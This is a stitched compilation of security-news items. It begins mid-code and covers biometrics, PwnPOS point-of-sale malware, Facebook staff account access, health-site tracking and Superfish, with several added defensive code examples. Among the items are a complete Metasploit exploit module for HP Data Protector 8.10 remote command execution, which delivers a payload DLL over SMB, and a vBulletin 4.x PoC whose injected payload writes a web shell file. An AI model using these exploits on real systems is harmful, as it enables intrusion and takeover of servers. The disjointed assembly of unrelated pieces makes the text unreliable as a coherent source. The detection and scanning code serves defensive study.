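        self.sessions.pop(sid, None)         # session.invalidate()
        new_sid = self.new_session()         # request.getSession(true)
        self.sessions[new_sid]["user"] = username
        return new_sid

    def logout(self, sid):
        """Invalidate server-side so a reused cookie cannot reopen post-login pages."""
        self.sessions.pop(sid, None)

    def current_user(self, sid):
        session = self.sessions.get(sid)
        return session["user"] if session else None
```

The same `hash_password`/`verify_password` pair serves the change-password and forgot-password flows the text mentions; only the login path needs the session rotation.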
  5. The options currently available for user authentication fall into three categories: something the user knows, such as a PIN or a password; something the user has, such as a token that generates random codes, a flash drive or a proximity card; and something the user is, established through biometrics, that is, something physically unique to the individual.

Today's system security professionals speak of passwords being too weak. Password authentication, for years the most widely used tool to protect data and systems, has often proven either too easy to break or too impractical to use when system administrators enforce long, complex and unmemorable alphanumeric passwords. Tokens and other devices have also proved not always effective, because of the cost of production and distribution and the possibility of their being stolen and used fraudulently. So what are the alternatives?

Biometrics, for one, can be used as a password replacement. This is an ideal solution for identity-based authentication of computer users, as it is for securing a computer facility. This article focuses on why so many people and businesses depend on biometrics to provide the highest level of security, addresses some of the new developments in biometric science that may help boost its acceptance and offset some of its shortcomings, and considers where the future lies for this type of technology. The open question is whether biometrics will play an important role in that future.

Biometrics Exposed: How it Works for User Authentication

Biometrics is the science and technology of analyzing human body characteristics. It is based on measuring and analyzing biological and behavioral data. Biometric recognition draws on patterns and measurements (characteristics that are unique to individuals) for authentication.
Many security experts agree that user authentication by linking a person to his or her body part(s) to establish an identity is a preferred method of enhancing security. In many cases, in fact, biometric-based personal identification/verification technology even eliminates the need for usernames or passwords. As a logical control, biometric systems can provide entry into systems; for physical security, they come in handy to control access to secure areas.

Biometric processing requires two stages: enrollment and authentication. The first phase comprises a capture stage and an extraction stage. A user is enrolled by having biometric data collected through a device that records distinctive physical characteristics and/or behavioral traits; video-optical images or thermal imaging scans are examples of what can be used for this purpose. Features are extracted from the sample and a template is created. The template is then stored in a database, linked to the person, for future identity matching. The second phase is authentication, when the data extracted from a fresh sample are compared with the stored template so the individual can be identified or verified. This phase also comprises two stages: comparison (the template is compared to the sample) and the match/non-match decision. Fundamentally, the course of action is detection, recognition, verification and then validation.

Examples of biometric data that can be used for identification and authentication are fingerprints, facial features, iris patterns and even vein patterns. These traits are seen as especially "unique" identifiers for recognizing humans. Most biometric techniques are implemented using a sensor that scans the subject; the system identifies and authenticates someone to a system or entry point only after comparing the extracted physical or behavioral feature set against the stored templates residing in a database.
In general, biometric methods are exceptionally reliable for a positive identity match. A false positive or false negative is rare, although possible, depending on the accuracy of the biometric system and the sensor characteristics. Although the hardware needed to implement biometric verification can be quite expensive, this type of technology has proven worth the price. As with all electronic technologies, biometric devices can be fooled by impostors, but they are nevertheless becoming more commonly used at business locations and work centers as trusted recognition systems that are sustainable in the long term for controlling access to high-security areas and, more importantly, for preventing identity theft.

Types of Biometrics: Physical and Behavioral Traits

There are two main types of biometric traits used for verification: physical traits, the more commonly used so far, and behavioral traits, based solely on measurements and data derived from an action or series of actions performed by the user. Physical biometrics uses "biological properties" that can uniquely determine an identity. Behavioral biometrics is based on "characteristic traits" exhibited by a person that can lead to his or her identification.

Physiological biometrics includes face recognition technology and finger and hand scans, in addition to measurements derived from the patterns of the iris or from a retinal scan, which reads the blood vessels at the back of the eye. Physiological biometrics (in particular fingerprints and DNA) is already widely used in forensics for criminal identification. Fingerprints, for one, have been used for years to prove an individual's identity electronically on the basis of unique biological characteristics. The method has been used to distinguish one individual from another, as no two people have the same fingerprints. Fingerprint scanners capture the user's finger imprint and compare it against a previously created biometric template.
A person's fingertip has come to be the most widely used source of biometric data. Behavioral biometrics includes voice scans, signature scans and keystroke scans. The human voice was found to be a viable authentication factor thanks to the possibility of recognizing a person through a unique voiceprint. Although effective, it is less secure than other behavioral traits, such as a keystroke scan, which requires no deliberate user action. Signature and keystroke scans can help recognize individuals by analyzing the way they write or their typing patterns.

Privacy, Concerns and Security Issues

Biometric authentication, based on "something users are", is considered the most secure method, ahead of a PIN, a password or smart card technology, for physical and logical access control. Every so often an uncovered password has led to a compromised system, while the use of cards has exposed information when they were lost or stolen. Biometric traits are normally unique and permanent, and hard to reproduce, especially in view of advances in technology, data communication security and biometric extraction devices. According to Biometrics.gov, the central source of information on biometrics-related activities of the U.S. federal government, "most biometric systems have a high accuracy (over 95 percent and many approach 100 percent) when matching biometrics against a large database of biometrics and when matching a biometric against the originally enrolled biometric."

The advantage of biometric security over more conventional systems is that it is easier to use in authentication situations, and yet it offers improved reliability and strengthened information delivery capabilities. Despite these advantages, there are open issues with these systems, some technical and some privacy-related. Much of the skepticism surrounding biometric technology has to do with privacy concerns about the storage, transmission and use of data that are perceived as extremely personal.
Users are mostly concerned, especially now that the technology has been introduced into the mobile device world, about the safety of their unique identifiers and about the efficacy, or absence, of laws governing the use and misuse of personal biometric data. Another source of concern is the increased use of biometrics in health service facilities and government, especially when mobile biometric technology is used to verify identities anywhere, on the go; the concern here regards the storage of data and their transmission to mobile devices. For the most part, the fact that information about people's body features and behavioral traits is recorded has always worried those concerned about their privacy. Many see the storage of such data and records as an infringement of privacy and personal rights. Biometric factors that are unique to a subject could enable tracking or monitoring of somebody's movements from that point on. Some fear biometric data being accessed and misused.

Users have also expressed concerns about possible forgeries. Authentication based on a signature scan that analyzes handwritten text is often seen as simple to spoof, since forgeries are possible with a simple optical scanner or a camera. That may be why digitized electronic signature generation, even though considered legally binding on documents, is not widely used, and other behavioral biometric technologies are used in its place. A fingerprint reader embedded in the laptop or keyboard, or added through a USB port, is a good alternative. However, fingerprints can also be compromised, as they can be lifted from touched items by an impostor looking to gain fraudulent access to resources. Voice biometric systems, unfortunately, are sometimes prone to loud ambient sounds or low-quality inputs that interfere with the ability to record a usable sample.
A voice biometric system could also be defeated by someone able to record another person's voice and play it back later to gain entry. Other difficulties come from input sensors being too sensitive, for example to aging or facial expressions. These are all valid concerns related to the use of biometric technology. It is true that biometric traits have been spoofed; however, they are definitely more secure than many other systems of authentication because they are naturally, physically or behaviorally linked to a person. Reproducing them requires sophisticated techniques and advanced technical knowledge that is not required to defeat other methods (getting hold of a token or stealing a password is a much simpler feat in comparison). In biometrics, what is stored is not an exact image of what has been scanned (the fingerprint, the retina, etc.) but a set of numbers derived during scanning; this extra step is meant to prevent malicious hackers from reproducing the image from which the numbers were extracted. Knowing that humans are often the weakest link in the security chain, password-based security mechanisms (which can be cracked, reset and socially engineered) might be replaced by biometrics, which can be a natural, effortless and much more accurate way to authenticate.

The Future

Biometrics is often seen today as an additional layer of protection to add to other, more traditional, authentication systems such as passwords and PINs. Using a second (or even a third) authentication mechanism may provide a much higher level of security in verifying the identity of a user. What the future might hold is a shift from multi-type authentication to synergistic multiple biometric systems. Unimodal biometric systems identify a person through only one trait. This is obviously not as accurate as we could wish and might not be adequate for all applications and uses.
Also, if collection of that single trait is affected in any way (for example by cream on the hands of a user identified by fingerprint, or by noise when collecting a voice sample), accuracy suffers. In addition, collecting only one type of data could exclude part of the user population when particular disabilities are present. The possibility of spoofing a single biometric trait is higher than that of compromising several at once. This is why a multimodal biometric system, which uses more than one trait for identification, can be more reliable and can resolve ambiguities and accuracy concerns.

Advances in behavioral (dynamic) biometrics are also giving new life to this technology and providing better and more accurate ways to authenticate users. Finger writing is a good example. This is a recognition and verification system based on gesture movement: the system learns a user's unique way of writing by collecting data over subsequent logins. The user is asked to handwrite four characters with a fingertip or pointing device, and the software extracts the unique way these letters and numbers are written (length, speed, angle, height). Tests on this system have shown it to be one of the most accurate recognition systems available: research by the Tolly Group, a testing and third-party verification provider, found a confidence rating of 99.97% and 27 times greater accuracy than keystroke analysis.

In terms of use, the future of biometrics could lie in mobile devices and in applications for eGovernment, eHealth and eBanking. Through mobile biometric scanning devices, authentication and identification can be brought into the field. It is easy to imagine the possible uses of such systems for other professions, such as law enforcement, border control, medical and emergency services, or to secure access to government or financial services.
The trend, in order to reduce the possibility of spoofing and replication of physical traits and to ease privacy concerns, is to base biometric systems on the collection of non-physical, dynamic traits. For example, the US military is developing a "cognitive fingerprint" system that might be able to replace faces, fingers and irises as identification traits. At West Point, in fact, an algorithm is being developed that allows identification through the way individuals interact with their computers; it considers behavioral information such as typing speed, writing rhythm and even common spelling mistakes. The algorithm creates a unique fingerprint for each user by combining multiple behavioral and stylometric signals that, collectively, are very difficult to reproduce. Once fully implemented, this solution could transfer from military use to more mundane civilian applications in e-banking, access to services and securing devices. Will the privacy concern be solved? Not really, as many believe that collection of this type of data could easily be embedded in commonly used applications and raise concerns about widespread profiling of users. Privacy versus security will be the battle fought over these systems' implementation.

Nevertheless, biometric technology could soon become mainstream thanks to the growth of the mobile device market. Biometrics Research Group, Inc. estimates that smartphone sales in the U.S. alone will grow to 121 million in 2018. Because of this proliferation, and of the increased functionality offered to users, its analysts believe there will be a strong push toward integrating biometric technology to replace traditional authentication by PIN and password. Biometrics Research Group, Inc.
predicted that in 2014 over 90 million smartphones would already be shipped with biometric technology, while Goode Intelligence has forecast that by 2019 the number of mobile and wearable biometric technology users worldwide will reach 5.5 billion.

Conclusion

Today biometrics matters more than ever before. In this digitally driven era, more users will come to rely on biometrics as an answer to problems of system security and authorization. Although privacy, security and accuracy concerns are still valid, biometrics remains a system that promises the security and ease of use needed by modern users who require access (even on the go) to sensitive data. Biometrics is already hard to forge or spoof, and new advances in technology and new trends such as multimodal systems can really ensure the highest security that sophisticated authentication can give to facilities and computer networks. As scanning devices are made less prone to mistakes and less subject to sensor error, it will become even easier and faster to implement a biometric security system on a larger scale. This, coupled with its use on mobile devices, will see the technology applied to a wide variety of new purposes, including border and law enforcement controls.

Although biometrics may be susceptible to false matches, possibly due to scanning and sensor errors, there are ways to minimize this today, by using multi-factor options such as a password or smart card combined with biometrics to add an extra layer of security to authentication. Used together, and not as alternatives, the systems are significantly stronger than when used individually. Two-factor authentication is not a new concept. The newest trends, however, see multi-biometrics (the use of different sets of biometric data simultaneously) as a good alternative for increasing matching accuracy in identification and verification.
Multimodal biometric systems, which use multiple sensors for data acquisition, combine several recognition algorithms and take advantage of each biometric technology while overcoming the limitations of any single one. Advances in algorithms for dynamic biometrics, less tied to physical characteristics and more to behavioral traits, are where civilian and military researchers are concentrating their efforts in trying to devise a security system that is at once foolproof, reliable and quick to use. The demand for quicker and more secure authentication on mobile devices will also boost the adoption of biometric technology. As biometric devices become more secure and error-free, as well as more affordable, the extra security they provide will ultimately outweigh the shortcomings of the technology and the concerns about privacy and safety. We might be closer to the end of passwords.

References

Brecht, D. (2011, January 4). Biometric Devices: They Provide IT Security. Retrieved from "Biometrics in IT Security: Questions, Options and Solutions".
Duncan, G. (2013, March 9). Why haven't biometrics replaced passwords yet? Digital Trends.
FRMC. (2014, September 11). Biometric Signature Authentication: The New Modality of Choice for Safe Guarding EMR Access. First Report Managed Care.
ID Control. (n.d.). Biometric Authentication Method Pros and Cons. Keystroke Biometrics: Strong Authentication with One Time Password, PKI and Keystroke Recognition.
Mayhew, S. (2014, August). Special Report: Mobile Biometric Authentication. BiometricUpdate.
Memon, S. (2014, February 28). Use of Mobile Biometrics Systems for ID Management in eServices. Retrieved from http://www.researchgate.net/profile/Sander_Khowaja/publication/260079452_Use_of_Mobile_Biometrics_Systems_for_ID_Management_in_eServices/links/00b7d5348eed55220b000000.pdf
PYMNTS. (2015, January 29). Next in ID Verification: Behavioral Biometrics. Retrieved from http://www.pymnts.com/news/2015/next-in-id-verification-behavioral-biometrics/#.VO8RT010yUl
Seals, T. (2015, January 29). US Military to Replace Passwords with "Cognitive Fingerprints". Retrieved from http://www.infosecurity-magazine.com/news/us-military-passwords-with/
Shahnewaz, M. (2014, December 14). How Mobile Biometrics is Fundamentally Changing Human Identification. Retrieved from http://www.infosecurity-magazine.com/opinions/how-mobile-biometrics-is-changing/
Trader, J. (2014, August 1). The Top 5 Reasons to Deploy Multimodal Biometrics. Retrieved from http://blog.m2sys.com/important-biometric-terms-to-know/top-5-reasons-deploy-multimodal-biometrics/

Source
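The enrollment, template, comparison and match/non-match flow described in "Biometrics Exposed", together with the false-accept/false-reject trade-off the article raises later, as an added example that is not part of the original post. The feature vectors, the cosine-similarity matcher and the sensor-noise model are constructed for illustration and stand in for a real biometric algorithm; what the code shows is that only a derived template is stored, that the decision is a threshold on a score, and how moving that threshold trades FAR against FRR.

```python
import math
import random


def enroll(sample):
    """Enrollment: reduce a raw capture (a list of feature measurements) to a
    template. Only this normalized vector is stored, never the raw capture."""
    norm = math.sqrt(sum(x * x for x in sample)) or 1.0
    return tuple(x / norm for x in sample)


def match_score(template, sample):
    """Comparison stage: cosine similarity between stored template and a fresh
    probe, in [-1, 1]; 1.0 means the same direction in feature space."""
    probe = enroll(sample)
    return sum(a * b for a, b in zip(template, probe))


def decide(template, sample, threshold):
    """Match/non-match decision."""
    return match_score(template, sample) >= threshold


def error_rates(genuine_scores, impostor_scores, threshold):
    """FAR = fraction of impostor attempts accepted (false positives);
    FRR = fraction of genuine attempts rejected (false negatives)."""
    far = sum(1 for s in impostor_scores if s >= threshold) / len(impostor_scores)
    frr = sum(1 for s in genuine_scores if s < threshold) / len(genuine_scores)
    return far, frr


def simulate_scores(seed=1, trials=500, dims=8, noise=0.1):
    """Constructed data: one enrolled subject re-captured with Gaussian sensor
    noise (genuine attempts) and unrelated random subjects (impostor attempts)."""
    rng = random.Random(seed)
    enrolled_raw = [rng.uniform(-1.0, 1.0) for _ in range(dims)]
    template = enroll(enrolled_raw)
    genuine = [
        match_score(template, [x + rng.gauss(0.0, noise) for x in enrolled_raw])
        for _ in range(trials)
    ]
    impostor = [
        match_score(template, [rng.uniform(-1.0, 1.0) for _ in range(dims)])
        for _ in range(trials)
    ]
    return genuine, impostor


def sweep(genuine, impostor, thresholds):
    """Trade-off table: each row is (threshold, FAR, FRR). Raising the threshold
    can only lower FAR and raise FRR; the operating point is a policy choice."""
    return [(t,) + error_rates(genuine, impostor, t) for t in thresholds]
```

Run `sweep(*simulate_scores(), [0.5, 0.7, 0.8, 0.9, 0.95])` to see the curve; a multimodal system in the article's sense would combine the scores of several such matchers before the threshold is applied.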
  6. ##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::SMB::Server::Share
  include Msf::Exploit::EXE

  def initialize(info={})
    super(update_info(info,
      'Name'           => 'HP Data Protector 8.10 Remote Command Execution',
      'Description'    => %q{
        This module exploits a remote command execution on HP Data Protector 8.10.
        Arbitrary commands can be executed by sending crafted requests with opcode 28
        to the OmniInet service listening on the TCP/5555 port. Since there is a strict
        length limitation on the command, rundll32.exe is executed, and the payload is
        provided through a DLL by a fake SMB server. This module has been tested
        successfully on HP Data Protector 8.1 on Windows 7 SP1.
      },
      'Author'         =>
        [
          'Christian Ramirez', # POC
          'Henoch Barrera', # POC
          'Matthew Hall <hallm[at]sec-1.com>' # Metasploit Module
        ],
      'References'     =>
        [
          ['CVE', '2014-2623'],
          ['OSVDB', '109069'],
          ['EDB', '34066'],
          ['URL', 'https://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c04373818']
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Payload'        =>
        {
          'Space'       => 2048,
          'DisableNops' => true
        },
      'Privileged'     => true,
      'Platform'       => 'win',
      'Stance'         => Msf::Exploit::Stance::Aggressive,
      'Targets'        =>
        [
          [ 'HP Data Protector 8.10 / Windows', { } ],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Nov 02 2014'))

    register_options(
      [
        Opt::RPORT(5555),
        OptString.new('FILE_NAME', [ false, 'DLL File name to share']),
        OptInt.new('SMB_DELAY', [true, 'Time that the SMB Server will wait for the payload request', 15])
      ], self.class)

    deregister_options('FOLDER_NAME')
    deregister_options('FILE_CONTENTS')
  end

  def check
    fingerprint = get_fingerprint
    if fingerprint.nil?
      return Exploit::CheckCode::Unknown
    end

    print_status("#{peer} - HP Data Protector version #{fingerprint}")

    if fingerprint =~ /HP Data Protector A\.08\.(\d+)/
      minor = $1.to_i
    else
      return Exploit::CheckCode::Safe
    end

    if minor < 11
      return Exploit::CheckCode::Appears
    end

    Exploit::CheckCode::Detected
  end

  def peer
    "#{rhost}:#{rport}"
  end

  def get_fingerprint
    ommni = connect
    ommni.put(rand_text_alpha_upper(64))
    resp = ommni.get_once(-1)
    disconnect

    if resp.nil?
      return nil
    end

    Rex::Text.to_ascii(resp).chop.chomp # Delete unicode last null
  end

  def send_pkt(cmd)
    cmd.gsub!("\\", "\\\\\\\\")
    pkt = "2\x00"
    pkt << "\x01\x01\x01\x01\x01\x01\x00"
    pkt << "\x01\x00"
    pkt << "\x01\x00"
    pkt << "\x01\x00"
    pkt << "\x01\x01\x00 "
    pkt << "28\x00"
    pkt << "\\perl.exe\x00 "
    pkt << "-esystem('#{cmd}')\x00"

    connect
    sock.put([pkt.length].pack('N') + pkt)
    disconnect
  end

  def primer
    self.file_contents = generate_payload_dll
    print_status("File available on #{unc}...")

    print_status("#{peer} - Trying to execute remote DLL...")
    sploit = "rundll32.exe #{unc},#{rand_text_numeric(1)}"
    send_pkt(sploit)
  end

  def setup
    super
    self.file_name = datastore['FILE_NAME'] || "#{Rex::Text.rand_text_alpha(4 + rand(3))}.dll"
    unless file_name =~ /\.dll$/
      fail_with(Failure::BadConfig, "FILE_NAME must end with .dll")
    end
  end

  def exploit
    begin
      Timeout.timeout(datastore['SMB_DELAY']) {super}
    rescue Timeout::Error
      # do nothing... just finish exploit and stop smb server...
    end
  end
end
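From the defender's side, the request layout in the module's send_pkt (a 4-byte big-endian length, then NUL-terminated fields, with "28" in the opcode position, "\perl.exe" as the program and a -esystem('...') argument) is enough to write a detector for this traffic on TCP/5555. The following is an added example, not part of the module or of Metasploit: it rebuilds a request exactly as send_pkt lays it out, purely to produce test input, then parses it and flags the opcode-28 perl system() pattern. The meaning of the other fields is not documented on the page, so the parser relies only on the field positions the module itself uses (an assumption).

```python
import struct


def build_omniinet_cmd_packet(cmd):
    """Constructed sample input laid out like the module's send_pkt: length prefix,
    NUL-separated fields, opcode field "28", "\\perl.exe", -esystem('cmd').
    Backslashes in cmd are doubled as the module does. Test input only."""
    escaped = cmd.replace("\\", "\\\\")
    body = (
        b"2\x00"
        + b"\x01\x01\x01\x01\x01\x01\x00"
        + b"\x01\x00" + b"\x01\x00" + b"\x01\x00"
        + b"\x01\x01\x00 "
        + b"28\x00"
        + b"\\perl.exe\x00 "
        + b"-esystem('" + escaped.encode("latin-1") + b"')\x00"
    )
    return struct.pack(">I", len(body)) + body


def parse_omniinet_packet(data):
    """Split one length-prefixed request into its NUL-separated fields.
    Raises ValueError on a short or truncated packet instead of guessing."""
    if len(data) < 4:
        raise ValueError("short packet")
    (length,) = struct.unpack(">I", data[:4])
    body = data[4:4 + length]
    if len(body) != length:
        raise ValueError("truncated packet")
    fields = body.split(b"\x00")
    if fields and fields[-1] == b"":
        fields.pop()  # drop the empty piece after the final NUL
    return fields


def is_opcode28_cmd_exec(data):
    """True when the request carries opcode 28 and asks perl.exe to run system()
    (field positions 6, 7 and 8+ as used by the module; assumption)."""
    try:
        fields = parse_omniinet_packet(data)
    except ValueError:
        return False
    if len(fields) < 9:
        return False
    opcode = fields[6].strip()
    program = fields[7].strip().lower()
    args = b" ".join(fields[8:]).lower()
    return opcode == b"28" and program.endswith(b"perl.exe") and b"system(" in args


def describe(data):
    """Alert summary: opcode, program and the argument string, for the analyst."""
    fields = parse_omniinet_packet(data)
    return {
        "opcode": fields[6].strip().decode("latin-1"),
        "program": fields[7].strip().decode("latin-1"),
        "args": fields[8].strip().decode("latin-1"),
    }
```

Feed `is_opcode28_cmd_exec` each client-to-server message reassembled from a TCP/5555 stream; `describe` gives the command string (for the module's payload, a rundll32.exe invocation against a UNC path) that the alert should carry.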
  7. Point-of-sale (PoS) malware has become one of the chief weapons used by attackers to steal credit and debit card data, and now researchers at Trend Micro say they have found yet another threat to add to the list of tools in criminals' toolboxes. The malware, dubbed PwnPOS, has managed to stay under the radar despite being active since at least 2013. According to Trend Micro, it has been spotted targeting small-to-midsized businesses (SMBs) in Japan, Australia, India, Canada, Germany, Romania and the United States.

Trend Micro threat analyst Jay Yaneza called PwnPOS an example of malware that has been "able to fly under the radar all these years due to its simple but thoughtful construction."

"Technically, there are two components of PwnPOS: 1) the RAM scraper binary, and 2) the binary responsible for data exfiltration," he explained in a blog post. "While the RAM scraper component remains constant, the data exfiltration component has seen several changes – implying that there are two, and possibly distinct, authors. The RAM scraper goes through a process' memory and dumps the data to the file and the binary uses SMTP for data exfiltration."

The malware targets devices running 32-bit versions of Windows XP and Windows 7. One of the keys to the malware's stealth appears to be its ability to add itself to, and remove itself from, the list of services on the PoS device.

"Most incident response and malware-related tools attempt to enumerate auto-run, auto-start or items that have an entry within the services applet in attempt to detect malicious files," Yaneza blogged. "Thus, having parameters that add and remove itself from the list of services allows the attacker to 'remain persistent' on the target POS machine when needed, while allowing the malicious file to appear benign as it waits within the %SYSTEM$ directory for the next time it is invoked."

PwnPOS enumerates all running processes and searches for card information. Afterward, the stolen data is dumped into a file and ultimately emailed to "a pre-defined mail account via SMTP with SSL and authentication," the researcher blogged.

Cybercriminals have increasingly been turning to ready-to-use point-of-sale malware kits. According to security firm CrowdStrike, such kits can cost from as little as tens of dollars to thousands, depending on their complexity.

Source: securityweek.com
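The article says the RAM scraper walks process memory "searching for card information" but does not say what pattern PwnPOS matches. The following added example (not PwnPOS code, and not from the article) shows what that search typically consists of, and doubles as the check a responder can run over a memory dump of a PoS process to confirm card data is exposed in the clear: a Track 2 pattern (;PAN=YYMM...?), a bare 13-19 digit PAN pattern, and the Luhn check that separates card numbers from receipt and order numbers. The memory snapshot is constructed; the card numbers are the standard Visa and Mastercard test numbers.

```python
import re

# Track 2 as written to a magnetic stripe: ';' PAN '=' YYMM service-code discretionary '?'
TRACK2_RE = re.compile(rb";(\d{13,19})=(\d{2})(\d{2})\d*\?")
# A bare 13-19 digit run that is not part of a longer digit run
PAN_RE = re.compile(rb"(?<!\d)(\d{13,19})(?!\d)")


def luhn_ok(pan):
    """Luhn mod-10 check: doubles every second digit from the right."""
    total = 0
    for i, ch in enumerate(reversed(pan)):
        d = int(ch)
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def scan_memory(buf):
    """Return sorted (pan, kind) pairs found in a process memory snapshot.

    kind is 'track2' when the PAN arrived with expiry and service code, else
    'pan'. Digit runs that fail Luhn (order numbers, timestamps) are ignored.
    """
    found = {}
    for m in TRACK2_RE.finditer(buf):
        pan = m.group(1).decode("ascii")
        if luhn_ok(pan):
            found[pan] = "track2"
    for m in PAN_RE.finditer(buf):
        pan = m.group(1).decode("ascii")
        if luhn_ok(pan):
            found.setdefault(pan, "pan")
    return sorted(found.items())


def mask(pan):
    """First six and last four only, for reporting without re-exposing the PAN."""
    return pan[:6] + "*" * (len(pan) - 10) + pan[-4:]


# Constructed snapshot of a PoS process's memory (not real data).
SAMPLE_MEMORY = (
    b"\x00\x00POSApp v2.1\x00cfg=c:\\pos\\app.ini\x00"
    b";4111111111111111=2512101123456789?\x00"
    b"receipt#1234567890123 total=19.99\x00"
    b"cache 5500000000000004 \x00"
    b"\x00\x00\x00"
)
```

Run `scan_memory` over a dump taken with the usual memory acquisition tooling; any hit means card data was in clear text in that process at capture time, which is exactly what a scraper like PwnPOS relies on.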
  9. Do you know that your Facebook account can be accessed by Facebook engineers, and that too without entering your account credentials? Recent details provided by the social network giant show who can access your Facebook account and when.

No doubt, Facebook and other big tech companies including Google, Apple and Yahoo! are trying to keep their data out of reach of law enforcement and spy agencies by adopting encrypted communication and end-to-end encryption solutions in the near future, but right now they have access to your personal data, and at least a few of their employees can access it with one click.

Earlier this week, Paavo Siljamäki, director at the record label Anjunabeats, brought attention to this issue by posting a very interesting story on his Facebook wall. During his visit to the Facebook office in LA, a Facebook engineer logged into his Facebook account with his permission, but the strange part was that they did it without asking him for the password.

ACCESS WITHOUT NOTIFICATION

Facebook didn't even notify Siljamäki that someone else had accessed his private Facebook profile, as the company does when your Facebook account is accessed from a new device or from a different geo-location. Siljamäki got in contact with Facebook in order to know how many of Facebook's staff have this kind of 'master' access to anyone's Facebook account, when exactly they can access users' private data, and also how anyone would know if his/her Facebook account has been accessed. When the social network giant was asked how the employee got access to a user's Facebook account without entering the account credentials, Facebook issued the following statement:

WHO CAN ACCESS MY FACEBOOK ACCOUNT?

The company didn't explain exactly who can access what, but it assured its users that account access is tiered and limited to specific job functions. Access to accounts is granted to most employees in order to reply to a customer request for information or an error report.

In short, the social network giant has a customer service tool that can grant Facebook employees access to a user's account. Facebook runs two separate monitoring systems that generate weekly reports on suspicious behavior, which are then reviewed and analyzed by two independent security teams, specifically a selected group of employees. Facebook gives a strict warning to newly hired employees about using this tool and directly fires any employee who abuses it. So you need not worry about Mark Zuckerberg accessing your account, unless you yourself ask Facebook for help with something and have given permission.

Source
  10. #################################################################################################################
[+] Exploit Title: vBulletin 4.x.x 'visitormessage.php' Remote Code Injection Vulnerability
[+] Discovered By: Dariush Nasirpour (Net.Edit0r)
[+] My Homepage: black-hg.org / nasirpour.info
[+] Date: [2015 27 February]
[+] Vendor Homepage: vBulletin.com
[+] Tested on: [vBulletin 4.2.2]
[+] Greeting : Ali Razmjoo - Ehsan Nezami - Arash Shams - Ramin Shahkar and all my friends ( #bhg )
#################################################################################################################

Remote Code Injection:
+++++++++++++++++++++++++

1) You must register in the vBulletin: http://www.victim.com/register.php (example: [blackhat])

2) Go to your user profile, example: [http://black-hg.org/cc/members/blackhat.html]

3) Post something in visitor message and record the post data with Live HTTP Headers [example]:

message_backup=&message=For-Test-Sample&wysiwyg=1&sbutton=%D8%A7%D8%B1%D8%B3%D8%A7%D9%84+%D9%BE%DB%8C%D8%BA%D8%A7%D9%85&fromquickcomment=1&s=&securitytoken=1425024074-5bcfb5b83d466416ed95e80021abee86063cdf6e&do=message&u=110&u2=&loggedinuser=110&parseurl=1&lastcomment=1425022046&allow_ajax_qc=1&fromconverse=

4) Change the message to anything: "For-Test-Sample" => "ALEEEEEEEEX" [because vBulletin doesn't let you send the same comment twice in a row]

[Now post this with hackbar:]

URL: http://black-hg.org/cc/visitormessage.php?do=message

[Post data]
message_backup=&message=ALEEEEEEEEX&wysiwyg=1&sbutton=%D8%A7%D8%B1%D8%B3%D8%A7%D9%84+%D9%BE%DB%8C%D8%BA%D8%A7%D9%85&fromquickcomment=1&s=&securitytoken=1425024074-5bcfb5b83d466416ed95e80021abee86063cdf6e&do=message&u=110&u2=&loggedinuser=110&parseurl=1&lastcomment=1425022046&allow_ajax_qc=1&fromconverse=

[And referrer data:]
PoC : http://black-hg.org/cc/members/blackhat.html?a=$stylevar[${${file_put_contents("shell.php","hacked[u can upload shell]")}}]"

5) Open hackbar and tamper it with Tamper Data: the referrer data has been URL encoded by the browser, so you have to replace it again with Tamper Data:

http://black-hg.org/cc/members/blackhat.html?a=$stylevar[${${file_put_contents("shell.php","hacked[you can upload shell]")}}]"

and submit the request.
################################################################################################################

Source
  11. GnuPG (the GNU Privacy Guard or GPG) is GNU's tool for secure communication and data storage. It can be used to encrypt data and to create digital signatures. It includes an advanced key management facility and is compliant with the proposed OpenPGP Internet standard as described in RFC2440. As such, it is meant to be compatible with PGP from NAI, Inc. Because it does not use any patented algorithms, it can be used without any restrictions. Changes: Multiple bug fixes. Translation updates. Download Home Page
  12. The breaches at Community Health Systems and Anthem, Inc. serve as prime examples of how valuable health care data can be to cybercriminals, but a recent study suggested that these intrusions should not be the only cause for concern for consumers.

A study conducted by Timothy Libert, a doctoral student at the University of Pennsylvania's Annenberg School for Communication, found that nine out of ten health-related websites share information regarding visitors' health interests with third parties. The websites included in the study, titled “Privacy Implications of Health Information Seeking on the Web,” are non-profit, educational, commercial, and government-run. Sites such as WebMD send data to up to 34 separate domains, according to a video by Libert on the study.

Using a tool he created that tracks HTTP requests initiated to third-party advertisers and data brokers, Libert was able to analyze 80,000 health-related web pages. According to his findings, 91 percent of the sites initiated requests to third parties and 70 percent included data on specific “symptoms, treatment, or diseases.” Those on the receiving end of the information included advertisers such as Google – which collected data from 78 percent of the pages – comScore (38 percent) and Facebook (31 percent), in addition to data brokers Experian and Acxiom.

The findings suggest that the privacy of users may be at risk, seeing as this data can be sold by data brokers legally, which further spreads the personal information, thus increasing the risk of compromise. Additionally, thanks to current marketing technology, consumers

While the Federal Trade Commission has advocated legislation to regulate the use of tools that many marketers and data brokers use to collect and sell consumer data, there is currently little oversight.

“Personal health information – historically protected by the Hippocratic Oath – has suddenly become the property of private corporations who may sell it to the highest bidder or accidentally misuse it to discriminate against the ill,” Libert said in a release by the university. “As health information seeking has moved online, the privacy of a doctor's office has been traded in for the silent intrusion of behavioral tracking.”

Source
  13. Security experts at G Data SecurityLabs have analysed the Superfish adware. In the process, the analysts came across a technology component in the program called SSL Digestor. It uses a root certificate that is weakly secured and has extensive rights on the computer. SSL Digestor intercepts secure HTTPS connections and can decrypt them. In this way, connections that are actually secured could be intercepted and attacked. This means that cybercriminals could use a man-in-the-middle attack to spy on or manipulate the data flow between two communication partners, for example a bank and its customer, by using a fake banking site. According to the G DATA experts, this part of the program is also contained in other software products. G Data security solutions detect the software as Gen: Variant.Adware.Superfish.1 (Engine A) and Win32.Riskware.Fishbone.A (Engine B). To remove the dangerous certificate, users have to take action.

“Superfish is a questionable adware program. However, because of the weakly secured SSL Digestor certificate, it is dangerous for users,” explains Ralf Benzmüller, head of G DATA SecurityLabs. “Affected users should remove the certificate immediately.”

What is Superfish?

